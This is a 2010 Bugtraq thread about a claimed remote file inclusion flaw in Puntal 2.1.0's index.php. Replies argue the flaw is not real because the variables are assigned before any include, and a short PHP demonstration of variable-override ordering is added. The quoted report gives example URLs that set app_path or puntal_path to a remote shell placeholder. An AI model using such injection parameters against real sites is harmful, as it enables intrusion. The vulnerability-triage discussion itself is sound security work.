Puntal (index.php) Remote File Inclusion Vulnerabilities
May 03 2010 06:10PM
eidelweiss cyberservices com
RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
May 03 2010 08:39PM
Tom Walsh - lists (mailinglist expresshosting net)
Re: Puntal (index.php) Remote File Inclusion Vulnerabilities
May 04 2010 05:15PM
Justin C. Klein Keane (justin madirish net)
I've found similar deficiencies in other "vulnerabilities" listed by
Justin C. Klein Keane
The digital signature on this message can be confirmed
using the public key at http://www.madirish.net/gpgkey
On 05/03/2010 04:39 PM, Tom Walsh - lists wrote:
> Both variables ($app_path and $puntal_path) are defined in the index.php
> file. As such they will never be overridden when the variables are passed
> via POST or GET. POST and GET variables are populated and placed into the
> global scope before the page is processed by the PHP processor engine
> (assuming register globals is enabled, which it hasn't been in a default PHP
> install in a long time).
> Line 29 of index.php: $app_path = '/';
> Line 41 of index.php: $puntal_path = dirname(__FILE__).$app_path;
> Additionally the following line (Line 43 of Index.php) calls a function
> specifically designed to unregister global variables in the global scope of
> the application.
> This is not an exploit. Never was.
> Nothing to see here... Move along.
>> -----Original Message-----
>> From: eidelweiss (at) cyberservices (dot) com [mailto:eidelweiss (at) cyberservices (dot) com]
>> Sent: Monday, May 03, 2010 1:10 PM
>> To: bugtraq (at) securityfocus (dot) com
>> Subject: Puntal (index.php) Remote File Inclusion Vulnerabilities
>> Puntal could allow a remote attacker to include malicious PHP files. An
>> attacker could send a specially-crafted URL request to the "index.php"
>> using the "app_path=" OR "puntal_path=" parameter to specify a malicious
>> file from a remote system, which would allow the attacker to execute
>> code on the vulnerable system.
>> Puntal 2.1.0 is vulnerable; other versions may also be affected.
>> An attacker can exploit these issues via a browser.
>> http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
>> http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll
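The ordering argument in the quoted reply can be checked with a few lines of PHP. This is an added example, not Puntal's code and not something posted in the thread: extract() stands in for register_globals, the 'INJECTED' request values are constructed, and path_guarded_default() and path_after_unregister() are hypothetical contrasts to the two assignments quoted from index.php.

```php
<?php
// Added example, not Puntal source. extract() stands in for register_globals,
// which created one variable per request parameter before line 1 of the script ran.

// Constructed request carrying the two parameters named in the report.
const SAMPLE_REQUEST = ['app_path' => 'INJECTED', 'puntal_path' => 'INJECTED'];

// Pattern quoted from index.php (lines 29 and 41): unconditional assignment.
function path_unconditional(array $request): string
{
    extract($request);                              // request values land first
    $app_path    = '/';                             // line 29 overwrites them
    $puntal_path = dirname(__FILE__) . $app_path;   // line 41 overwrites them
    return $puntal_path;                            // value an include would use
}

// Hypothetical contrast: a default applied only when the variable is unset.
// Under register_globals the request value survives this pattern.
function path_guarded_default(array $request): string
{
    extract($request);
    if (!isset($puntal_path)) {
        $puntal_path = dirname(__FILE__) . '/';
    }
    return $puntal_path;
}

// Hypothetical stand-in for the "unregister globals" step the reply mentions:
// drop every variable named after a request parameter, then apply the default.
function path_after_unregister(array $request): string
{
    extract($request);
    foreach (array_keys($request) as $name) {
        unset($$name);
    }
    if (!isset($puntal_path)) {
        $puntal_path = dirname(__FILE__) . '/';
    }
    return $puntal_path;
}

// Report, for each pattern, whether the script or the request decided the path.
$expected = dirname(__FILE__) . '/';
foreach (['path_unconditional', 'path_guarded_default', 'path_after_unregister'] as $fn) {
    $verdict = $fn(SAMPLE_REQUEST) === $expected ? 'script-controlled' : 'request-controlled';
    printf("%-22s %s\n", $fn, $verdict);
}
```

When triaging a file-inclusion report of this kind, the question is which of these three shapes the variable follows between the start of the script and the include that uses it.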
Copyright 2010, SecurityFocus